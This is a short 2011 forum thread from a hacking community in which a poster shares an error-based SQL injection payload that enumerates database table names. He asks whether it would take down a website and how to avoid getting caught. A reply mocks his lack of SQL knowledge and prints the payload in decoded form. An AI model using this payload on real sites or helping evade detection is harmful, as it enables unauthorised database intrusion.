EvilZone

Community => General discussion => Topic started by: Santa on November 06, 2011, 06:43:30 PM

Title: SQL injection question
Post by: Santa on November 06, 2011, 06:43:30 PM
Ok guys i have a question
will the SQL injection

 index.php?lvl=categories&id=453+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6F63696D%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1


work to take down a website site such as ( www. (http://www.thetechgame.com)evilzone.org)
if so what security measures should i take so i dont get caught doing this and what should i download to keep me safe from anything else
Title: Re: SQL injection question
Post by: ca0s on November 06, 2011, 06:54:12 PM
Do you really understand how SQLi works? Do you even know SQL? And how it is like accessing to any website with its correspondent logging?
If so, well, you will know the answer to your question. If not, go and learn. Ande made a nice tut about SQLi. There are a lot of basic manuals of SQL, use google.
Also
Code: [Select]
(select 1 from
  (select count(*),
  concat(
    (select
      (select
        (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F63696D)
    ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x
    from `information_schema`.tables group by x)a) and 1=1
Ohmy.
Title: Re: SQL injection question
Post by: Santa on November 06, 2011, 06:59:50 PM
Quote from: ca0s on November 06, 2011, 06:54:12 PM
Do you really understand how SQLi works? Do you even know SQL? And how it is like accessing to any website with its correspondent logging?
If so, well, you will know the answer to your question. If not, go and learn. Ande made a nice tut about SQLi. There are a lot of basic manuals of SQL, use google.
Also
Code: [Select]
(select 1 from
  (select count(*),
  concat(
    (select
      (select
        (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from `information_schema`.tables where table_schema=0x6F63696D)
    ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x
    from `information_schema`.tables group by x)a) and 1=1
Ohmy.

No i dont but I want to learn I will check out andes's post when I have time